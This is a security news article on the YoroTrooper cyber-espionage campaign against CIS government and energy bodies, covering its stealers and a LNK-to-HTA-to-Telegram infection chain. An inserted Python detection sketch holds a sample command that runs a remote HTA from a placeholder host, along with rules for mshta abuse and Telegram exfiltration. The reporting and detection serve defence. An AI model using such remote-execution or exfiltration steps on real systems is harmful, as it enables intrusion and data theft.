YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

Mar 15, 2023 | Ravie Lakshmanan | Cyber Espionage / Data Security
A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022.

“Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots,” Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in a Tuesday analysis.

Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) nations.

The threat actor is believed to be Russian-speaking owing to the victimology patterns and the presence of Cyrillic snippets in some of the implants.

That said, the YoroTrooper intrusion set has been found to exhibit tactical overlaps with the PoetRAT team that was documented in 2020 as leveraging coronavirus-themed baits to strike government and energy sectors in Azerbaijan.

YoroTrooper’s data gathering goals are realized through a combination of commodity and open source stealer malware such as Ave Maria (aka Warzone RAT), LodaRAT, Meterpreter, and Stink, with the infection chains using malicious shortcut files (LNKs) and decoy documents wrapped in ZIP or RAR archives that are propagated via spear-phishing.

The LNK files function as simple downloaders to execute an HTA file retrieved from a remote server, which is then used to display a lure PDF document, while stealthily launching a dropper to deliver a custom stealer that uses Telegram as an exfiltration channel.
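The chain described above (LNK runs a remote HTA, the HTA spawns a dropper, the stealer talks to Telegram) leaves three observable seams in endpoint telemetry. The following detection sketch is an added example, not code from the article or from Cisco Talos; it runs three rules over constructed process-creation and network events in an assumed JSON-lines schema (field names `event`, `image`, `parent_image`, `cmdline`, `dest_host` are assumptions, not a real EDR format), and the hostnames and paths in the sample are placeholders.

```python
"""Added example: flag the stages of a LNK -> remote HTA -> dropper -> Telegram
exfiltration chain in simplified endpoint telemetry.

The telemetry below is constructed for this example. The schema (event, pid,
ppid, image, parent_image, cmdline, dest_host) is an assumption, not a real
EDR format, and every hostname and path is a placeholder.
"""
import json
import re
from typing import Dict, List

# Any http(s) URL on the mshta command line means the HTA was fetched remotely.
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Assumed allowlist: image names that legitimately talk to the Telegram API.
ALLOWED_TELEGRAM_IMAGES = {"telegram.exe"}

# Constructed sample telemetry (JSON lines): one malicious chain plus two benign events.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"ts": "2023-03-14T09:01:02Z", "event": "process", "pid": 4120, "ppid": 1188,
                "image": r"C:\Windows\System32\mshta.exe",
                "parent_image": r"C:\Windows\explorer.exe",
                "cmdline": "mshta.exe http://placeholder.invalid/update.hta"}),
    json.dumps({"ts": "2023-03-14T09:01:03Z", "event": "process", "pid": 4188, "ppid": 4120,
                "image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
                "parent_image": r"C:\Windows\System32\mshta.exe",
                "cmdline": "svc.exe"}),
    json.dumps({"ts": "2023-03-14T09:01:09Z", "event": "network", "pid": 4188,
                "image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
                "dest_host": "api.telegram.org", "dest_port": 443}),
    json.dumps({"ts": "2023-03-14T09:02:00Z", "event": "process", "pid": 4300, "ppid": 1188,
                "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                "parent_image": r"C:\Windows\explorer.exe",
                "cmdline": "WINWORD.EXE report.docx"}),
    json.dumps({"ts": "2023-03-14T09:02:05Z", "event": "network", "pid": 2200,
                "image": r"C:\Program Files\Telegram Desktop\Telegram.exe",
                "dest_host": "api.telegram.org", "dest_port": 443}),
])


def parse_events(text: str) -> List[Dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(win_path: str) -> str:
    """Last component of a Windows path, lower-cased (works off-Windows too)."""
    return win_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chain(events: List[Dict]) -> List[Dict]:
    """Apply three rules that map onto the described infection chain."""
    findings = []
    for e in events:
        if e.get("event") == "process":
            image = basename(e.get("image", ""))
            parent = basename(e.get("parent_image", ""))
            # Rule 1: mshta.exe given a URL, i.e. an HTA pulled from a remote server.
            if image == "mshta.exe" and URL_RE.search(e.get("cmdline", "")):
                findings.append({"rule": "remote_hta_execution", "pid": e["pid"],
                                 "detail": e.get("cmdline", "")})
            # Rule 2: anything spawned by mshta.exe (the dropper launched from the HTA).
            if parent == "mshta.exe":
                findings.append({"rule": "process_spawned_by_mshta", "pid": e["pid"],
                                 "detail": e.get("image", "")})
        elif e.get("event") == "network":
            image = basename(e.get("image", ""))
            # Rule 3: Telegram API traffic from a process that is not a known Telegram client.
            if e.get("dest_host", "").lower() == "api.telegram.org" \
                    and image not in ALLOWED_TELEGRAM_IMAGES:
                findings.append({"rule": "telegram_api_from_unexpected_process",
                                 "pid": e["pid"], "detail": e.get("image", "")})
    return findings


def run_example() -> List[Dict]:
    """Run the rules over the constructed sample and return the findings."""
    return detect_chain(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for f in run_example():
        print(f"{f['rule']:36} pid={f['pid']:<6} {f['detail']}")
```

Rules 1 and 2 are cheap and high-signal on most fleets, because mshta.exe rarely has a business reason to fetch content over HTTP or to spawn children; rule 3 depends on the allowlist matching what actually runs in the environment, so tune it before alerting on it.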


WEBINAR

Discover
the
Hidden
Dangers
of
Third-Party
SaaS
Apps

Are
you
aware
of
the
risks
associated
with
third-party
app
access
to
your
company’s
SaaS
apps?
Join
our
webinar
to
learn
about
the
types
of
permissions
being
granted
and
how
to
minimize
risk.

RESERVE
YOUR
SEAT

The use of LodaRAT is notable as it indicates that the malware is being employed by multiple operators despite its attribution to another group called Kasablanka, which has also been observed distributing Ave Maria in recent campaigns targeting Russia.

Other auxiliary tools deployed by YoroTrooper consist of reverse shells and a C-based custom keylogger that’s capable of recording keystrokes and saving them to a file on disk.

“It is worth noting that while this campaign began with the distribution of commodity malware such as Ave Maria and LodaRAT, it has evolved significantly to include Python-based malware,” the researchers said.

“This highlights an increase in the efforts the threat actor is putting in, likely derived from successful breaches during the course of the campaign.”
